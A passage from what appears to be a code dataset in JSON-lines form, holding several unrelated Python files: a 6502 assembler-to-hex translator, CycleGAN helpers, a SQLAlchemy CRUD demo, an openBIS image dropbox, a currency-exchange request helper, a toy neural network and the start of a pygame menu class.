'null', 'BRA': '70', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLC': {'SNGL': '18', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLD': {'SNGL': 'd8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLI': {'SNGL': '58', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CLV': {'SNGL': 'b8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'CMP': {'SNGL': 'null', 'INDY': 'd1', 'IMM': 'c9', 'INDX': 'c1', 'ZPX': 'd5', 'ABS': 'cd', 'ABSY': 'd9', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'c5', 'ABSX': 'dd'},\r\n 'CPX': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'e0', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'ec', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'e4', 'ABSX': 'null'},\r\n 'CPY': {'SNGL': 'null', 'INDY': 'null', 
'IMM': 'c0', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'cc', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'c4', 'ABSX': 'null'},\r\n 'DEC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'd6', 'ABS': 'ce', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'c6', 'ABSX': 'de'},\r\n 'DEX': {'SNGL': 'ca', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'DEY': {'SNGL': '88', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'EOR': {'SNGL': 'null', 'INDY': '51', 'IMM': '49', 'INDX': '41', 'ZPX': '55', 'ABS': '4d', 'ABSY': '59', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '45', 'ABSX': '5d'},\r\n 'INC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'f6', 'ABS': 'ee', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'e6', 'ABSX': 'fe'},\r\n 'INX': {'SNGL': 'e8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'INY': {'SNGL': 'c8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'JMP': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '4c', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': '6c', 'ZP': 'null', 'ABSX': 'null'},\r\n 'JSR': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '20', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'LDA': {'SNGL': 'null', 'INDY': 'b1', 'IMM': 'a9', 'INDX': 'a1', 'ZPX': 'b5', 'ABS': 'ad', 'ABSY': 'b9', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'a5', 'ABSX': 'bd'},\r\n 'LDX': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'a2', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'ae', 'ABSY': 'be', 'BRA': 'null', 'ZPY': 'b6', 'IND': 'null', 'ZP': 'a6', 'ABSX': 'null'},\r\n 'LDY': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'a0', 'INDX': 'null', 'ZPX': 'b4', 'ABS': 'ac', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'a4', 'ABSX': 'bc'},\r\n 'LSR': {'SNGL': '4a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '56', 'ABS': '4e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '46', 'ABSX': '5e'},\r\n 'NOP': {'SNGL': 'ea', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'ORA': {'SNGL': 'null', 'INDY': '11', 'IMM': '09', 'INDX': '01', 'ZPX': '15', 'ABS': '0d', 'ABSY': '19', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '05', 'ABSX': '1d'},\r\n 'PHA': {'SNGL': '48', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'PHP': {'SNGL': '08', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'PLA': {'SNGL': '68', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 
'null', 'ABSX': 'null'},\r\n 'PLP': {'SNGL': '28', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'ROL': {'SNGL': '2a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '36', 'ABS': '2e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '26', 'ABSX': '3e'},\r\n 'ROR': {'SNGL': '6a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '76', 'ABS': '6e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '66', 'ABSX': '7e'},\r\n 'RTI': {'SNGL': '40', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'RTS': {'SNGL': '60', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'SBC': {'SNGL': 'null', 'INDY': 'f1', 'IMM': 'e9', 'INDX': 'e1', 'ZPX': 'f5', 'ABS': 'ed', 'ABSY': 'f9', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'e5', 'ABSX': 'fd'},\r\n 'SEC': {'SNGL': '38', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'SED': {'SNGL': 'f8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'SEI': {'SNGL': '78', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'STA': {'SNGL': 'null', 'INDY': '91', 'IMM': 'null', 'INDX': '81', 'ZPX': '95', 'ABS': '8d', 'ABSY': '99', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '85', 'ABSX': '9d'},\r\n 'STX': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '8e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': '96', 'IND': 'null', 'ZP': '86', 'ABSX': 'null'},\r\n 'STY': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '94', 'ABS': '8c', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '84', 'ABSX': 'null'},\r\n 'TAX': {'SNGL': 'aa', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TAY': {'SNGL': 'a8', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TSX': {'SNGL': 'ba', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TXA': {'SNGL': '8a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TXS': {'SNGL': '9a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'TYA': {'SNGL': '98', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'WDM': {'SNGL': 'null', 'INDY': 'null', 'IMM': '42', 'INDX': 
'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '42', 'ABSX': 'null'},\r\n}\r\n\r\n# for negative hex values\r\ndef toHex(val, nbits):\r\n return hex((val + (1 << nbits)) % (1 << nbits))\r\n\r\ntwoByteAddress = re.compile('\\$[0-9]{4}')\r\n\r\nfileName = input('Select an assembly file: ')\r\nfile = open(fileName, 'r')\r\n\r\nbytePosition = 0\r\nprocessedLines = []\r\nlabels = {}\r\n\r\n# loop to get positions of labels \r\nfor line in file:\r\n # strip comments and newlines\r\n commentStart = line.find(';')\r\n if (commentStart != -1):\r\n line = line[0:commentStart]\r\n line = line.strip()\r\n if (line):\r\n splitLine = line.split(' ')\r\n arguments = len(splitLine)\r\n processedLines.append({'data': splitLine, 'length': arguments, 'bytePosition': bytePosition})\r\n # we have a label AND an opcode AND an address on this line\r\n if (arguments == 3 and splitLine[0].endswith(':')):\r\n # remove colon before adding it to labels\r\n labels[splitLine[0][:-1]] = bytePosition\r\n if (twoByteAddress.search(splitLine[2])):\r\n bytePosition += 3\r\n else:\r\n bytePosition += 2\r\n\r\n elif (arguments == 2):\r\n # label and implicitly addressed opcode\r\n if (splitLine[0].endswith(':')):\r\n # remove colon before adding it to labels\r\n labels[splitLine[0][:-1]] = bytePosition\r\n bytePosition += 1\r\n # opcode and address\r\n else:\r\n if (twoByteAddress.search(splitLine[1])):\r\n bytePosition += 3\r\n else:\r\n bytePosition += 2\r\n\r\n elif (arguments == 1):\r\n # just a label\r\n if (splitLine[0].endswith(':')):\r\n # remove colon before adding it to labels\r\n labels[splitLine[0][:-1]] = bytePosition\r\n # just an implicitly addressed opcode\r\n else:\r\n bytePosition += 1\r\n else:\r\n continue\r\n\r\nbytePosition = 0\r\nhexOutput = \"\"\r\n# loop to actually convert\r\nfor line in processedLines:\r\n # take the labels out of lines\r\n if (line['data'][0].endswith(':')):\r\n line['length'] -= 1\r\n line['data'] = line['data'][1:]\r\n\r\n # only process lines that aren't just labels\r\n if(line['length'] > 0):\r\n opcode = line['data'][0]\r\n address = 'null'\r\n if (line['length']) == 2:\r\n address = line['data'][1]\r\n\r\n if (opcode in opcodes.keys()):\r\n # implicit\r\n if (line['length'] == 1):\r\n print(opcodes[opcode]['SNGL'])\r\n hexOutput += (opcodes[opcode]['SNGL']) + ' '\r\n elif (line['length'] == 2):\r\n # immediate\r\n if(address.startswith('#')):\r\n print(opcodes[opcode]['IMM'] + ' ' + address[2:])\r\n hexOutput += opcodes[opcode]['IMM'] + ' ' + address[2:] + ' '\r\n elif (address.startswith('(')):\r\n # indexed indirect\r\n if address[4] == ',':\r\n print(opcodes[opcode]['INDX'] + ' ' + address[2:4])\r\n hexOutput += opcodes[opcode]['INDX'] + ' ' + address[2:4] + ' '\r\n # indirect index\r\n elif address[5] == ',':\r\n print(opcodes[opcode]['INDY'] + ' ' + address[2:4])\r\n hexOutput += opcodes[opcode]['INDY'] + ' ' + address[2:4] + ' '\r\n # indirect\r\n else:\r\n print(opcodes[opcode]['IND'] + ' ' + address[4:6] + ' ' + address[2:4])\r\n hexOutput += opcodes[opcode]['IND'] + ' ' + address[4:6] + ' ' + address[2:4] + ' '\r\n elif (address.startswith('$')):\r\n operandLength = len(address)\r\n # absolute X and Y\r\n if (operandLength == 7):\r\n mode = 'ABS' + address[6].upper()\r\n print(opcodes[opcode][mode] + ' ' + address[3:5] + ' ' + address[1:3])\r\n hexOutput += opcodes[opcode][mode] + ' ' + address[3:5] + ' ' + address[1:3] + ' '\r\n # zero page\r\n elif (operandLength == 3):\r\n print(opcodes[opcode]['ZP'] + ' ' 
+ address[1:])\r\n                        hexOutput += opcodes[opcode]['ZP'] + ' ' + address[1:] + ' '\r\n                    # zero page X and Y\r\n                    elif (address[3] == ','):\r\n                        mode = 'ZP' + address[4].upper()\r\n                        print(opcodes[opcode][mode] + ' ' + address[1:3])\r\n                        hexOutput += opcodes[opcode][mode] + ' ' + address[1:3] + ' '\r\n                    # absolute\r\n                    else:\r\n                        print(opcodes[opcode]['ABS'] + ' ' + address[3:] + ' ' + address[1:3])\r\n                        hexOutput += opcodes[opcode]['ABS'] + ' ' + address[3:] + ' ' + address[1:3] + ' '\r\n                elif (address in labels.keys()):\r\n                    # relative addressing with label\r\n                    byteDiff = labels[address] - line['bytePosition'] - 2 # subtract 2 because branch offsets are counted from the byte after the two-byte instruction\r\n                    print(opcodes[opcode]['BRA'] + ' ' + toHex(byteDiff, 8)[2:])\r\n                    hexOutput += opcodes[opcode]['BRA'] + ' ' + toHex(byteDiff, 8)[2:] + ' '\r\n                else:\r\n                    print('Unrecognized operand format.\\nProblem with line: ', line)\r\n                    break\r\n            else:\r\n                print('Invalid line length')\r\n        else:\r\n            print('No opcode found')\r\n            break\r\n\r\nprint(hexOutput.strip())","sub_path":"nes-pratool/translator/assembly-to-hex.py","file_name":"assembly-to-hex.py","file_ext":"py","file_size_in_byte":17123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"362556581","text":"# helper functions for saving sample data and models\n\n# import data loading libraries\nimport os\nimport pdb\nimport pickle\nimport argparse\nimport random  # needed by ReplayBuffer below\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# import torch\nimport torch\nfrom torch.autograd import Variable  # needed by ReplayBuffer below\n\n# numpy & scipy imports\nimport numpy as np\nimport scipy\nimport imageio\n\ndef checkpoint(iteration, G_XtoY, G_YtoX, D_X, D_Y, checkpoint_dir='checkpoints_cyclegan'):\n    \"\"\"Saves the parameters of both generators G_YtoX, G_XtoY and discriminators D_X, D_Y.\n    \"\"\"\n    G_XtoY_path = os.path.join(checkpoint_dir, 'G_XtoY.pkl')\n    G_YtoX_path = os.path.join(checkpoint_dir, 'G_YtoX.pkl')\n    D_X_path = os.path.join(checkpoint_dir, 'D_X.pkl')\n    D_Y_path = os.path.join(checkpoint_dir, 'D_Y.pkl')\n    torch.save(G_XtoY.state_dict(), G_XtoY_path)\n    torch.save(G_YtoX.state_dict(), G_YtoX_path)\n    torch.save(D_X.state_dict(), D_X_path)\n    torch.save(D_Y.state_dict(), D_Y_path)\n\n\ndef merge_images(sources, targets, batch_size=16):\n    \"\"\"Creates a grid consisting of pairs of columns, where the first column in\n    each pair contains source images and the second column in each pair\n    contains images generated by the CycleGAN from the corresponding images in\n    the first column.\n    \"\"\"\n    _, _, h, w = sources.shape\n    row = int(np.sqrt(batch_size))\n    merged = np.zeros([3, row*h, row*w*2])\n    for idx, (s, t) in enumerate(zip(sources, targets)):\n        i = idx // row\n        j = idx % row\n        merged[:, i*h:(i+1)*h, (j*2)*h:(j*2+1)*h] = s\n        merged[:, i*h:(i+1)*h, (j*2+1)*h:(j*2+2)*h] = t\n    merged = merged.transpose(1, 2, 0)\n    return merged\n    \n\ndef to_data(x):\n    \"\"\"Converts variable to numpy.\"\"\"\n    if torch.cuda.is_available():\n        x = x.cpu()\n    x = x.data.numpy()\n    x = ((x +1)*255 / (2)).astype(np.uint8) # rescale to 0-255\n    return x\n\ndef save_samples(iteration, fixed_Y, fixed_X, G_YtoX, G_XtoY, batch_size=16, sample_dir='../samples/summer2winter'):\n    \"\"\"Saves samples from both generators X->Y and Y->X.\n    \"\"\"\n    # move input data to correct device\n    device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n    fake_X = G_YtoX(fixed_Y.to(device))\n    fake_Y = G_XtoY(fixed_X.to(device))\n    \n    X, fake_X = to_data(fixed_X), to_data(fake_X)\n    Y, fake_Y = to_data(fixed_Y), to_data(fake_Y)\n    \n    merged = (255 - merge_images(X, fake_Y, batch_size)).astype(np.uint8)\n    
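    # NOTE: merge_images interleaves source and generated columns into one grid;
    # the (255 - ...) step inverts the palette before saving, which appears to be
    # a deliberate styling choice for the saved sample sheets.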
path = os.path.join(sample_dir, 'sample-{:06d}-X-Y.png'.format(iteration))\n    imageio.imwrite(path, merged)\n    \n    merged = (255 - merge_images(Y, fake_X, batch_size)).astype(np.uint8)  # parenthesize before casting, matching the X->Y branch above\n    path = os.path.join(sample_dir, 'sample-{:06d}-Y-X.png'.format(iteration))\n    imageio.imwrite(path, merged)\n    \n    \nclass ReplayBuffer():\n    def __init__(self, max_size=50):\n        assert (max_size > 0), 'Empty buffer or trying to create a black hole. Be careful.'\n        self.max_size = max_size\n        self.data = []\n\n    def push_and_pop(self, data):\n        to_return = []\n        for element in data.data:\n            element = torch.unsqueeze(element, 0)\n            if len(self.data) < self.max_size:\n                self.data.append(element)\n                to_return.append(element)\n            else:\n                if random.uniform(0,1) > 0.5:\n                    i = random.randint(0, self.max_size-1)\n                    to_return.append(self.data[i].clone())\n                    self.data[i] = element\n                else:\n                    to_return.append(element)\n        return Variable(torch.cat(to_return))\n","sub_path":"03-CycleGAN/src/.ipynb_checkpoints/helpers-checkpoint.py","file_name":"helpers-checkpoint.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"427979129","text":"from sqlalchemy import (\n    create_engine, Column, Integer, String\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n\n# executing the instruction from the \"chinook\" database\n# /// == localhost (chinook)\ndb = create_engine(\"postgresql:///chinook\")\nbase = declarative_base()\n\n# create a class-based model for the \"Programmer\" table\nclass Programmer(base):\n    __tablename__ = \"Programmer\"\n    id = Column(Integer, primary_key=True)\n    first_name = Column(String)\n    last_name = Column(String)\n    gender = Column(String)\n    nationality = Column(String)\n    famous_for = Column(String)\n\n\n# instead of connecting to the database directly, we will ask for a session\n# create a new instance of sessionmaker, then point to our engine (the db)\nSession = sessionmaker(db)\n# opens an actual session by calling the Session() subclass defined above\nsession = Session()\n\n# creating the database using the declarative_base subclass\nbase.metadata.create_all(db)\n\n# creating records on our Programmer table\nada_lovelace = Programmer(\n    first_name=\"Ada\",\n    last_name=\"Lovelace\",\n    gender=\"F\",\n    nationality=\"British\",\n    famous_for=\"First Programmer\"\n)\n\n# add each instance of our programmers to our session\nsession.add(ada_lovelace)\n\n# commit our session to the database\nsession.commit()\n\n# query the database to find all programmers\nprogrammers = session.query(Programmer)\nfor programmer in programmers:\n    print(\n        programmer.id,\n        programmer.first_name + \" \" + programmer.last_name,\n        programmer.gender,\n        programmer.nationality,\n        programmer.famous_for,\n        sep=\" | \"\n    )","sub_path":"sql-crud.py","file_name":"sql-crud.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"155818387","text":"import os\nfrom ch.systemsx.cisd.openbis.dss.etl.dto.api import ChannelColor\nfrom ch.systemsx.cisd.openbis.dss.etl.dto.api import SimpleImageDataConfig\nfrom ch.systemsx.cisd.openbis.dss.etl.dto.api import ImageMetadata\nfrom ch.systemsx.cisd.openbis.plugin.screening.shared.api.v1.dto import Geometry\n\nSPACE_CODE = \"TEST\"\nPROJECT_CODE = \"TEST-PROJECT\"\nPROJECT_ID = \"/%(SPACE_CODE)s/%(PROJECT_CODE)s\" % vars()\nEXPERIMENT_CODE = \"DEMO-EXP-HCS\"\nEXPERIMENT_ID = 
\"/%(SPACE_CODE)s/%(PROJECT_CODE)s/%(EXPERIMENT_CODE)s\" % vars()\n\nPLATE_CODE = \"PLATE\"\nPLATE_ID = \"/%(SPACE_CODE)s/%(PLATE_CODE)s\" % vars()\nPLATE_ID_WITH_PROJECT = \"/%(SPACE_CODE)s/%(PROJECT_CODE)s/%(PLATE_CODE)s\" % vars()\nPLATE_GEOMETRY_PROPERTY_CODE = \"$PLATE_GEOMETRY\"\nPLATE_GEOMETRY = \"384_WELLS_16X24\"\n\n\ndef create_space_if_needed(transaction):\n space = transaction.getSpace(SPACE_CODE)\n if None == space:\n space = transaction.createNewSpace(SPACE_CODE, None)\n transaction.getLogger().info('Creating new space: ' + SPACE_CODE)\n space.setDescription(\"A demo space\")\n\ndef create_project_if_needed(transaction):\n project = transaction.getProject(PROJECT_ID)\n if None == project:\n create_space_if_needed(transaction)\n project = transaction.createNewProject(PROJECT_ID)\n transaction.getLogger().info('Creating new project: ' + PROJECT_ID)\n project.setDescription(\"A demo project\")\n \ndef create_experiment_if_needed(transaction):\n \"\"\" Get the specified experiment or register it if necessary \"\"\"\n exp = transaction.getExperiment(EXPERIMENT_ID)\n if None == exp:\n create_project_if_needed(transaction)\n transaction.getLogger().info('Creating new experiment: ' + EXPERIMENT_ID)\n exp = transaction.createNewExperiment(EXPERIMENT_ID, 'SIRNA_HCS')\n \n return exp\n \ndef create_plate_if_needed(transaction):\n \"\"\" Get the specified sample or register it if necessary \"\"\"\n if transaction.serverInformation.get('project-samples-enabled') == 'true':\n plate_id = PLATE_ID_WITH_PROJECT\n else:\n plate_id = PLATE_ID\n\n samp = transaction.getSample(plate_id)\n\n if None == samp:\n exp = create_experiment_if_needed(transaction)\n samp = transaction.createNewSample(plate_id, 'PLATE')\n transaction.getLogger().info('Creating new plate: ' + plate_id)\n samp.setPropertyValue(PLATE_GEOMETRY_PROPERTY_CODE, PLATE_GEOMETRY)\n samp.setExperiment(exp)\n \n return samp\n\n \nclass MyImageDataSetConfig(SimpleImageDataConfig):\n def extractImageMetadata(self, imagePath):\n \n basename = os.path.splitext(imagePath)[0]\n (plate, well, tile, channelCode) = basename.split(\"_\")\n \n image_tokens = ImageMetadata()\n image_tokens.well = well\n try:\n image_tokens.tileNumber = int(tile)\n except ValueError:\n raise Exception(\"Cannot parse field number from '\" + tile + \"' in '\" + basename + \"' file name.\")\n \n image_tokens.channelCode = channelCode\n return image_tokens\n \n def getChannelColor(self, channelCode):\n dict = { \"GFP\" : ChannelColor.GREEN, \"DAPI\" : ChannelColor.BLUE, \"CY3\" : ChannelColor.RED }\n if channelCode in dict:\n return dict[channelCode]\n else:\n return None \n \n def getTileGeometry(self, imageTokens, maxTileNumber):\n return Geometry.createFromRowColDimensions(maxTileNumber / 3, 3) \n\ndef process(transaction): \n incoming = transaction.getIncoming()\n if incoming.isDirectory():\n imageDataset = MyImageDataSetConfig()\n imageDataset.setRawImageDatasetType()\n imageDataset.setGenerateThumbnails(True)\n imageDataset.setUseImageMagicToGenerateThumbnails(False)\n imageDataset.addGeneratedImageRepresentationWithResolution(\"512x512\")\n plate = create_plate_if_needed(transaction)\n dataset = transaction.createNewImageDataSet(imageDataset, incoming);\n dataset.setSample(plate)\n transaction.moveFile(incoming.getPath(), 
dataset);\n","sub_path":"screening/source/core-plugins/screening/4/dss/drop-boxes/hcs-dropbox/hcs-dropbox.py","file_name":"hcs-dropbox.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67881069","text":"from datetime import datetime\n\nimport requests\nfrom exchanges import settings\n\n\nproxies = getattr(settings, 'PROXIES', None)\n\n# NOTE: this hard-coded proxy dict overrides the PROXIES value read from settings above\nproxies = dict(\n    http=\"172.16.51.174:8118\",\n    https=\"172.16.51.174:8118\",\n)\n\n\ndef get_datetime():\n    return datetime.now().strftime('%Y-%m-%d')\n\n\ndef get_response(url):\n    response = requests.get(url, proxies=proxies, timeout=5)\n    response.raise_for_status()\n    return response.json()\n","sub_path":"exchanges/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446833725","text":"from scipy import misc\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nclass Layer:\n    def __init__(self, W, b, f):\n        self._W = W\n        self._b = b\n        self._f = f\n\n    def propagate_forward(self, x):\n        return self._f(self._W @ x + self._b)\n\ndef sigmoid(s):\n    return 1 / (1 + np.exp(-s))\n\nif __name__ == '__main__':\n    # input\n    x = misc.imread('img/9.png', flatten = True).flatten()\n    x = x.reshape((len(x), 1))\n    print('---- x -----')\n    print(x)\n\n    # layer1\n    n_output_1 = len(x)\n    W1 = np.random.randn(n_output_1, len(x))\n    b1 = np.random.randn(n_output_1, 1)\n    layer1 = Layer(W1, b1, sigmoid)\n\n    # layer2\n    n_output_2 = 10\n    W2 = np.random.randn(n_output_2, n_output_1)\n    b2 = np.random.randn(n_output_2, 1)\n    layer2 = Layer(W2, b2, sigmoid)\n\n    y1 = layer1.propagate_forward(x)\n    y2 = layer2.propagate_forward(y1)  # chain layer 1's output into layer 2\n\n    hist_W1, bins_W1 = np.histogram(W1.flatten())\n    hist_W2, bins_W2 = np.histogram(W2.flatten())\n\n    index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n    plt.title('Prediction')\n    plt.bar(index, y2.flatten(), align='center')\n    plt.xticks(index, index)\n    plt.show()\n","sub_path":"tacamula/layered_neuron.py","file_name":"layered_neuron.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589289080","text":"import pygame\r\nfrom Game_math import Rectangle, Point\r\n\r\n\r\ndef color_txt_changer(color_index, color_change_delta, lighting, fogging):\r\n    if lighting:\r\n        if color_index + color_change_delta <= 255:\r\n            color_index += color_change_delta\r\n        else:\r\n            lighting = False\r\n            fogging = True\r\n\r\n    if fogging:\r\n        if color_index - color_change_delta >= 10:\r\n            color_index -= color_change_delta\r\n        else:\r\n            lighting = True\r\n            fogging = False\r\n\r\n    return color_index, lighting, fogging\r\n\r\nclass Start_window:\r\n    def __init__(self, screen, screen_width, screen_height, image, FPS_index, cannon_level):\r\n        self.__window_width = screen_width\r\n        self.__window_height = screen_height\r\n        self.__screen = screen\r\n        self.cannon_level = cannon_level\r\n        self.__image = pygame.image.load(image)\r\n        self.__flashing_txt_color_index = 0\r\n        self.__color_change_delta = int(255 / (FPS_index))\r\n        self.__fogging = False\r\n        self.__lighting = True \r\n\r\n    def draw_start_window(self):\r\n        self.__draw_game_title()\r\n        